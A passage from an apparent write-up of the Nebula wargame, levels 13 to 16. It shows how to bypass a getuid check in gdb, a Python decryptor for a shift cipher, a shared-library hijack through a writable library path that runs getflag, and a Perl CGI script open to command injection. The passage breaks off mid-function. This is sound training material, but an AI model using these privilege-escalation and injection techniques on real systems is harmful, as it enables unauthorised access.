<span class="mh">0x080485f3</span><span class="w"> </span><span class="o"><+</span><span class="mi">303</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">ret</span><span class="w"></span>
</code></pre></div>
<p>As the assembly shows, the following snippet checks whether the call
to <code>getuid()</code> returned 1000 (<code>0x3e8</code>):</p>
<div class="highlight"><pre><span></span><code><span class="err">0</span><span class="nf">x080484f4</span><span class="w"> </span><span class="err"><+</span><span class="mi">48</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">cmp</span><span class="w"> </span><span class="no">eax</span><span class="p">,</span><span class="mi">0x3e8</span><span class="w"></span>
<span class="err">0</span><span class="nf">x080484f9</span><span class="w"> </span><span class="err"><+</span><span class="mi">53</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">je</span><span class="w"> </span><span class="mh">0x8048531</span> <span class="p"><</span><span class="no">main</span><span class="p">+</span><span class="mi">109</span><span class="p">></span><span class="w"></span>
</code></pre></div>
<p>If the jump is taken, we continue at <code>main+109</code>. There, some decoding happens. In fact, the
lines:</p>
<div class="highlight"><pre><span></span><code><span class="err">0</span><span class="nf">x08048547</span><span class="w"> </span><span class="err"><+</span><span class="mi">131</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">mov</span><span class="w"> </span><span class="no">edx</span><span class="p">,</span><span class="mi">0x804874c</span><span class="w"></span>
<span class="err">0</span><span class="nf">x0804854c</span><span class="w"> </span><span class="err"><+</span><span class="mi">136</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">lea</span><span class="w"> </span><span class="no">eax</span><span class="p">,[</span><span class="no">esp</span><span class="err">+</span><span class="mi">0x2c</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>grab the string <code>8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob</code> from the <code>.data</code> section and prepare a
buffer on the stack for further processing. The following <code>mov</code> statements copy the string into that buffer,
and the loop starting at <code>main+209</code> then XORs every byte with <code>0x5a</code>. This is the reason why the string doesn't work right away as login password for the flag13 account:
it is transformed first.
Anyway, we just set the <code>eax</code> register to 1000 in place of our <code>getuid()</code> return value to circumvent the check
and let the program decode the token for us:</p>
<div class="highlight"><pre><span></span><code>level13@nebula:/home/flag13$ gdb flag13
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
<...snipp...>
(gdb) break *(main+48)
Breakpoint 1 at 0x80484f4
(gdb) r
Starting program: /home/flag13/flag13
Breakpoint 1, 0x080484f4 in main ()
(gdb) i r
eax 0x3f6 1014
ecx 0xbfa37f54 -1079804076
edx 0xbfa37ee4 -1079804188
ebx 0x287ff4 2654196
esp 0xbfa37d80 0xbfa37d80
ebp 0xbfa37eb8 0xbfa37eb8
esi 0x0 0
edi 0x0 0
eip 0x80484f4 0x80484f4 <main+48>
eflags 0x282 [ SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) set $eax = 1000
(gdb) continue
Continuing.
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
[Inferior 1 (process 2096) exited with code 063]
(gdb) quit
level13@nebula:/home/flag13$ su flag13
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
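<p>The decoding can also be reproduced outside the debugger. The following is a minimal sketch, assuming that the loop at
<code>main+209</code> (the <code>xor edx,0x5a</code> instruction) is the only transformation applied to the string. The names
<code>ENCODED</code> and <code>xor_decode</code> are made up for this illustration and do not appear in the binary:</p>

```python
# Encoded string as read from the binary (see the disassembly above).
ENCODED = "8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob"


def xor_decode(s, key=0x5A):
    """XOR every character of s with a single-byte key (assumed: 0x5a)."""
    return "".join(chr(ord(c) ^ key) for c in s)


token = xor_decode(ENCODED)
print(token)
```

<p>The printed value matches the token that the program emitted in the gdb session above.</p>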
<h2>Level 14 - Decrypting simple encryption</h2>
<p>This level is also quite easy. The setuid binary <code>/home/flag14/flag14</code> encrypts its input. When we run
<code>./flag14 -e</code>, repeatedly enter the same character and press escape, we see that each output character
is one further along than the previous one: the character at position <code>i</code> is shifted forward by <code>i</code>.</p>
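<p>A minimal sketch of that behaviour, inferred only from the observed output and not from the binary itself (the function
name <code>encrypt</code> is hypothetical):</p>

```python
def encrypt(s):
    """Shift the character at position i forward by i (observed behaviour)."""
    return "".join(chr(ord(c) + i) for i, c in enumerate(s))


# Entering the same character repeatedly yields consecutive characters.
print(encrypt("aaaa"))
```

<p>Under this assumption the first character maps to itself, which is why the repeated input turns into an ascending run.</p>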
<p>Then we have a file with a encrypted token for the account <code>flag14</code>. </p>
<div class="highlight"><pre><span></span><code>level14@nebula:/home/flag14$ xxd token
<span class="m">0000000</span>: <span class="m">3835</span> 373a <span class="m">6736</span> 373f <span class="m">3541</span> <span class="m">4242</span> 6f3a <span class="m">4274</span> <span class="m">857</span>:g67?5ABBo:Bt
<span class="m">0000010</span>: <span class="m">4441</span> 3f74 <span class="m">4976</span> 4c44 4b4c 7b4d <span class="m">5150</span> <span class="m">5352</span> DA?tIvLDKL<span class="o">{</span>MQPSR
<span class="m">0000020</span>: <span class="m">5157</span> 572e 0a QWW..
</code></pre></div>
<p>To decrypt it, I created a simple Python script that reverses the encryption logic:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Each input character is encoded like this:</span>
<span class="sd"> enc(char_i) = chr(ord(char) + i)</span>
<span class="sd"> This means that the first input character is mapped to itself and the</span>
<span class="sd"> nth character is mapped to enc(char_n) = chr(ord(char) + n)</span>
<span class="sd"> """</span>
<span class="n">out</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="n">out</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span>
<span class="k">return</span> <span class="n">out</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="nb">print</span> <span class="n">decrypt</span><span class="p">(</span><span class="s1">'857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW</span><span class="se">\x2e</span><span class="s1">'</span><span class="p">)</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>Executing this yields the token <code>8457c118-887c-4e40-a5a6-33a25353165</code> which is the password for
the flag14 account.</p>
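<p>For reference, here is a Python 3 sketch of the same position-based shift in both directions. The <code>encrypt()</code> function is an assumption reconstructed from the observed behaviour, not taken from the binary. The ciphertext is the first 35 characters of the hexdump above.</p>

```python
def encrypt(plain):
    """Shift the character at index i up by i (index 0 stays unchanged)."""
    return "".join(chr(ord(c) + i) for i, c in enumerate(plain))


def decrypt(cipher):
    """Undo encrypt(): shift the character at index i down by i."""
    return "".join(chr(ord(c) - i) for i, c in enumerate(cipher))


# First 35 characters of the token file, as shown in the xxd output.
CIPHERTEXT = "857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW"

token = decrypt(CIPHERTEXT)
print(token)

# Entering the same character repeatedly produces consecutive characters.
print(encrypt("aaaa"))
```

<p>Running <code>encrypt()</code> on the recovered token should give back the ciphertext, which is a quick sanity check for the assumed scheme.</p>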
<h2>Level 15 - Injecting own shared libraries</h2>
<p>When we call <code>/home/flag15/flag15</code> it outputs </p>
<blockquote>
<p>strace it!</p>
</blockquote>
<p>So I straced it:</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ strace ./flag15
execve<span class="o">(</span><span class="s2">"./flag15"</span>, <span class="o">[</span><span class="s2">"./flag15"</span><span class="o">]</span>, <span class="o">[</span>/* <span class="m">28</span> vars */<span class="o">])</span> <span class="o">=</span> <span class="m">0</span>
brk<span class="o">(</span><span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x8750000
access<span class="o">(</span><span class="s2">"/etc/ld.so.nohwcap"</span>, F_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
mmap2<span class="o">(</span>NULL, <span class="m">8192</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7879000
access<span class="o">(</span><span class="s2">"/etc/ld.so.preload"</span>, R_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15"</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFDIR<span class="p">|</span><span class="m">0775</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">60</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
open<span class="o">(</span><span class="s2">"/etc/ld.so.cache"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
fstat64<span class="o">(</span><span class="m">3</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFREG<span class="p">|</span><span class="m">0644</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">33815</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">33815</span>, PROT_READ, MAP_PRIVATE, <span class="m">3</span>, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7870000
close<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
access<span class="o">(</span><span class="s2">"/etc/ld.so.nohwcap"</span>, F_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/lib/i386-linux-gnu/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
read<span class="o">(</span><span class="m">3</span>, <span class="s2">"\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"</span>..., <span class="m">512</span><span class="o">)</span> <span class="o">=</span> <span class="m">512</span>
fstat64<span class="o">(</span><span class="m">3</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFREG<span class="p">|</span><span class="m">0755</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">1544392</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">1554968</span>, PROT_READ<span class="p">|</span>PROT_EXEC, MAP_PRIVATE<span class="p">|</span>MAP_DENYWRITE, <span class="m">3</span>, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x110000
mmap2<span class="o">(</span>0x286000, <span class="m">12288</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_FIXED<span class="p">|</span>MAP_DENYWRITE, <span class="m">3</span>, 0x176<span class="o">)</span> <span class="o">=</span> 0x286000
mmap2<span class="o">(</span>0x289000, <span class="m">10776</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_FIXED<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x289000
close<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">4096</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb786f000
set_thread_area<span class="o">({</span>entry_number:-1 -> <span class="m">6</span>, base_addr:0xb786f8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x286000, <span class="m">8192</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x8049000, <span class="m">4096</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x8e6000, <span class="m">4096</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
munmap<span class="o">(</span>0xb7870000, <span class="m">33815</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
fstat64<span class="o">(</span><span class="m">1</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFCHR<span class="p">|</span><span class="m">0620</span>, <span class="nv">st_rdev</span><span class="o">=</span>makedev<span class="o">(</span><span class="m">136</span>, <span class="m">0</span><span class="o">)</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">4096</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7878000
write<span class="o">(</span><span class="m">1</span>, <span class="s2">"strace it!\n"</span>, 11strace it!
<span class="o">)</span> <span class="o">=</span> <span class="m">11</span>
exit_group<span class="o">(</span><span class="m">11</span><span class="o">)</span> <span class="o">=</span> ?
</code></pre></div>
<p>As you can see the dynamic linker tries to load the <code>libc</code> from the directory <code>/var/tmp/flag15/</code>. This is a very unusual
path and a quick check reveals that this directory is owned by user <code>level15</code>, which means we can write to it.</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ ls -dl /var/tmp/flag15/
drwxrwxr-x <span class="m">1</span> level15 level15 <span class="m">60</span> Oct <span class="m">4</span> <span class="m">13</span>:59 /var/tmp/flag15/
</code></pre></div>
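<p>The order in which the linker probes the subdirectories in the trace follows a regular pattern: every combination of <code>tls</code>, <code>i686</code>, <code>sse2</code> and <code>cmov</code> is tried, from the most specific down to the bare directory. The sketch below only reproduces the order observed in this strace output; it is not a description of how the linker computes the list internally, and <code>candidate_paths</code> is a made-up helper name.</p>

```python
from itertools import product


def candidate_paths(base, lib, caps=("tls", "i686", "sse2", "cmov")):
    """List the paths in the order they appear in the strace output above."""
    paths = []
    # product() yields (True, True, True, True) first and all-False last,
    # i.e. the most specific subdirectory first and the bare directory last.
    for mask in product((True, False), repeat=len(caps)):
        parts = [cap for cap, enabled in zip(caps, mask) if enabled]
        paths.append("/".join([base, *parts, lib]))
    return paths


paths = candidate_paths("/var/tmp/flag15", "libc.so.6")
for path in paths:
    print(path)
```

<p>The last entry, <code>/var/tmp/flag15/libc.so.6</code>, is the simplest place to drop a replacement library.</p>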
<p>After having tried several paths below <code>/var/tmp/flag15/</code>, the dynamic linker finally finds its libc in
<code>/lib/i386-linux-gnu/libc.so.6</code> and loads it into memory:</p>
<div class="highlight"><pre><span></span><code>open<span class="o">(</span><span class="s2">"/lib/i386-linux-gnu/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
read<span class="o">(</span><span class="m">3</span>, <span class="s2">"\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"</span>..., <span class="m">512</span><span class="o">)</span> <span class="o">=</span> <span class="m">512</span>
</code></pre></div>
<p>The basic idea is to create our own libc and patch the <code>puts()</code> function that the binary uses.
As we can see in the strace output, the string <code>strace it!</code> is ultimately written by the <code>write()</code>
call at the end.</p>
<p>What if we could replace the <code>write()</code> function that libc provides?</p>
<p>Let's try it. I created the following C program:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#define _GNU_SOURCE</span>
<span class="kt">int</span><span class="w"> </span><span class="nf">write</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">buf</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="s">"strace it!</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Inside hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/bin/getflag >> /tmp/flagged"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>and issued the following commands:</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ cat /tmp/write.c
<span class="c1">#include <stdlib.h></span>
<span class="c1">#include <stdio.h></span>
<span class="c1">#define _GNU_SOURCE</span>
int write<span class="o">(</span>int fd, const char* buf<span class="o">)</span> <span class="o">{</span>
<span class="k">if</span> <span class="o">(</span>strcmp<span class="o">(</span>buf, <span class="s2">"strace it!\n"</span><span class="o">)</span> <span class="o">==</span> <span class="m">0</span><span class="o">)</span> <span class="o">{</span>
printf<span class="o">(</span><span class="s2">"Inside hook!\n"</span><span class="o">)</span><span class="p">;</span>
system<span class="o">(</span><span class="s2">"/bin/getflag >> /tmp/flagged"</span><span class="o">)</span><span class="p">;</span>
<span class="o">}</span>
<span class="k">return</span> <span class="m">0</span><span class="p">;</span>
<span class="o">}</span>
level15@nebula:/home/flag15$ gcc -Wall -fPIC -shared -o /var/tmp/flag15/libc.so.6 /tmp/write.c
/tmp/write.c: In <span class="k">function</span> write:
/tmp/write.c:7:2: warning: implicit declaration of <span class="k">function</span> strcmp <span class="o">[</span>-Wimplicit-function-declaration<span class="o">]</span>
level15@nebula:/home/flag15$ ./flag15
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by ./flag15<span class="o">)</span>
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by /var/tmp/flag15/libc.so.6<span class="o">)</span>
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by /var/tmp/flag15/libc.so.6<span class="o">)</span>
./flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined <span class="k">in</span> file libc.so.6 with link <span class="nb">time</span> reference
</code></pre></div>
<p>It seems that creating our own <code>libc</code> is not that easy. But this is definitely the right direction to investigate further.</p>
<h2>Level 16 - Exploiting with an uppercase-only charset</h2>
<p>In this level we need to exploit a CGI web application written in Perl.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env perl</span>
<span class="k">use</span> <span class="nn">CGI</span> <span class="sx">qw{param}</span><span class="p">;</span>
<span class="k">print</span> <span class="s">"Content-type: text/html\n\n"</span><span class="p">;</span>
<span class="k">sub</span> <span class="nf">login</span> <span class="p">{</span>
<span class="nv">$username</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="nv">$username</span> <span class="o">=~</span> <span class="nb">tr</span><span class="sr">/a-z/</span><span class="n">A</span><span class="o">-</span><span class="n">Z</span><span class="o">/</span><span class="p">;</span> <span class="c1"># conver to uppercase</span>
<span class="nv">$username</span> <span class="o">=~</span> <span class="sr">s/\s.*//</span><span class="p">;</span> <span class="c1"># strip everything after a space</span>
<span class="nv">@output</span> <span class="o">=</span> <span class="sb">`egrep "^$username" /home/flag16/userdb.txt 2>&1`</span><span class="p">;</span>
<span class="k">foreach</span> <span class="nv">$line</span> <span class="p">(</span><span class="nv">@output</span><span class="p">)</span> <span class="p">{</span>
<span class="p">(</span><span class="nv">$usr</span><span class="p">,</span> <span class="nv">$pw</span><span class="p">)</span> <span class="o">=</span> <span class="nb">split</span><span class="p">(</span><span class="sr">/:/</span><span class="p">,</span> <span class="nv">$line</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$pw</span> <span class="o">=~</span> <span class="nv">$password</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">sub</span> <span class="nf">htmlz</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"<html><head><title>Login resuls</title></head><body>"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Your login was accepted<br/>"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Your login failed<br/>"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Would you like a cookie?<br/><br/></body></html>\n"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">htmlz</span><span class="p">(</span><span class="n">login</span><span class="p">(</span><span class="n">param</span><span class="p">(</span><span class="s">"username"</span><span class="p">),</span> <span class="n">param</span><span class="p">(</span><span class="s">"password"</span><span class="p">)));</span>
</code></pre></div>
<p>The web app executes the command <code>egrep "^$username" /home/flag16/userdb.txt 2>&1</code>, where the username
can be passed as a GET parameter. Before it is substituted into the command, the username
is converted to uppercase and everything from the first whitespace character onward is removed.</p>
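<p>To see which payloads survive this filter, the two Perl substitutions can be approximated in Python. This is only a sketch: <code>sanitize_username</code> is a made-up name, and Python's regex engine is assumed to behave like Perl's for this simple pattern.</p>

```python
import re
import string

# Perl: tr/a-z/A-Z/  (only ASCII letters are affected)
_TO_UPPER = str.maketrans(string.ascii_lowercase, string.ascii_uppercase)


def sanitize_username(username):
    """Approximate the two transformations applied by the CGI script."""
    upper = username.translate(_TO_UPPER)
    # Perl: s/\s.*//  (drop the first whitespace and the rest of that line)
    return re.sub(r"\s.*", "", upper, count=1, flags=re.ASCII)


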